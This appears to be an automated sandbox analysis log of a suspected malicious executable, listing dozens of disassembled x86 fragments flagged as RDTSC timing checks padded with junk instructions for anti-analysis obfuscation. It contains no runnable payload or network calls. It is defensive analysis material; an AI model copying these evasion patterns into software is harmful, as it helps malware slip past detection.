Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65A33E second address: 65A395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F2810BC4668h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movsx esi, dx 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+124594E3h], ebx 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+1246C842h], ebx 0x00000037 xchg eax, ebx 0x00000038 jmp 00007F2810BC4672h 0x0000003d push eax 0x0000003e push eax 0x0000003f js 00007F2810BC466Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 661A0B second address: 661A7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jns 00007F2810745896h 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F281074589Dh 0x00000019 pop edx 0x0000001a nop 0x0000001b mov dword ptr [ebp+1246C8A3h], eax 0x00000021 push 00000000h 0x00000023 mov edi, dword ptr [ebp+122D2521h] 0x00000029 mov di, 13B2h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F2810745898h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 movzx ebx, di 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 pop eax 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 661A7B second address: 661A88 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66293E second address: 66297A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2000h], edi 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D33E9h], edx 0x00000018 push 00000000h 0x0000001a jmp 00007F28107458A2h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F281074589Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66297A second address: 6629B5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2810BC467Ch 0x00000008 jmp 00007F2810BC4676h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2810BC4678h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6638E5 second address: 6638EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663AB7 second address: 663ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66582D second address: 665848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 665848 second address: 6658E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2810BC4668h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 movsx edi, si 0x00000027 mov ebx, dword ptr [ebp+122D17F1h] 0x0000002d clc 0x0000002e push 00000000h 0x00000030 jmp 00007F2810BC4679h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 sub dword ptr [ebp+122D2731h], edx 0x0000003e pop ebx 0x0000003f movzx edi, cx 0x00000042 push eax 0x00000043 pushad 0x00000044 jmp 00007F2810BC4674h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F2810BC4678h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 665A41 second address: 665A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 666904 second address: 66690C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 665A48 second address: 665A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66690C second address: 666933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F2810BC4678h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66786D second address: 6678DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F2810745898h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push 00000000h 0x00000025 and edi, dword ptr [ebp+122D2802h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F2810745898h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov edi, 7432353Eh 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F281074589Ch 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 666B47 second address: 666B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6678DD second address: 6678F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6678F7 second address: 667901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2810BC4666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667A57 second address: 667A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667A5B second address: 667A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6696E9 second address: 6696EE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667A5F second address: 667A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6696EE second address: 669766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007F28107458B0h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F2810745898h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b and di, 47F9h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F2810745898h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c xchg eax, esi 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667A65 second address: 667A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2810BC466Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669766 second address: 66976A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66976A second address: 669780 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jbe 00007F2810BC4670h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667B39 second address: 667B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2810745896h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F28107458A0h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 667B59 second address: 667B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61A01C second address: 61A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61A022 second address: 61A029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61A029 second address: 61A03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F281074589Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66BC92 second address: 66BC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2810BC4666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66ECC4 second address: 66ED1A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28107458AAh 0x00000008 jmp 00007F28107458A4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F2810745898h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov ebx, eax 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D272Ch] 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d js 00007F2810745896h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66ED1A second address: 66ED24 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66EE70 second address: 66EE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67AFC1 second address: 67AFDF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2810BC4666h 0x00000008 jmp 00007F2810BC466Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jnl 00007F2810BC4666h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67AFDF second address: 67AFFC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2810745896h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F281074589Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67AFFC second address: 67B012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC466Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2810BC4666h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67B413 second address: 67B445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F281074589Ch 0x00000007 ja 00007F28107458A2h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F281074589Ah 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007F281074589Eh 0x0000001e pushad 0x0000001f popad 0x00000020 jl 00007F2810745896h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F076 second address: 67F07C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684FA9 second address: 684FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684FAF second address: 684FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jns 00007F2810BC4666h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 684FBD second address: 684FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F2810745896h 0x00000012 jnc 00007F2810745896h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F281074589Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68528E second address: 6852C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F2810BC4666h 0x00000009 jmp 00007F2810BC4678h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F2810BC466Dh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AE9D second address: 68AEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AEA2 second address: 68AEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AEA8 second address: 68AEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AEAC second address: 68AEE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2810BC466Ah 0x0000000c push edx 0x0000000d pop edx 0x0000000e jp 00007F2810BC4666h 0x00000014 jmp 00007F2810BC466Ch 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007F2810BC466Eh 0x00000024 je 00007F2810BC4666h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AEE7 second address: 68AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AEEF second address: 68AEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AEF4 second address: 68AF0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F281074589Fh 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 614E2D second address: 614E39 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2810BC4666h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689B42 second address: 689B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689B60 second address: 689B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689CD8 second address: 689CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689CDC second address: 689CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689E2E second address: 689E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 689E3D second address: 689E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68A597 second address: 68A59D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68A59D second address: 68A5A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AB7A second address: 68AB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AB7F second address: 68AB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2810BC466Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AB8D second address: 68AB93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AB93 second address: 68AB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68AB9C second address: 68ABA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6916BE second address: 6916C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6916C4 second address: 6916CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6916CA second address: 6916E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2810BC466Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6916E0 second address: 6916E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6916E6 second address: 6916EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65ECDE second address: 65ECE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65ECE2 second address: 65ECF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F2810BC4666h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65ECF0 second address: 65ED3E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2810745896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sbb dx, F5D8h 0x00000013 lea eax, dword ptr [ebp+12480A58h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F2810745898h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 nop 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F28107458A5h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65ED3E second address: 65ED56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2810BC4670h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65ED56 second address: 65ED68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F28107458B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65ED68 second address: 63CE61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4678h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F2810BC4668h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+12447B91h] 0x0000002a mov di, 09F2h 0x0000002e call dword ptr [ebp+122D1B6Dh] 0x00000034 push ebx 0x00000035 js 00007F2810BC467Bh 0x0000003b push edi 0x0000003c pop edi 0x0000003d jmp 00007F2810BC4673h 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65EE7F second address: 65EE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F38C second address: 65F392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F392 second address: 65F3DE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2810745898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d jmp 00007F28107458A4h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jl 00007F2810745896h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F28107458A5h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F3DE second address: 65F3E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
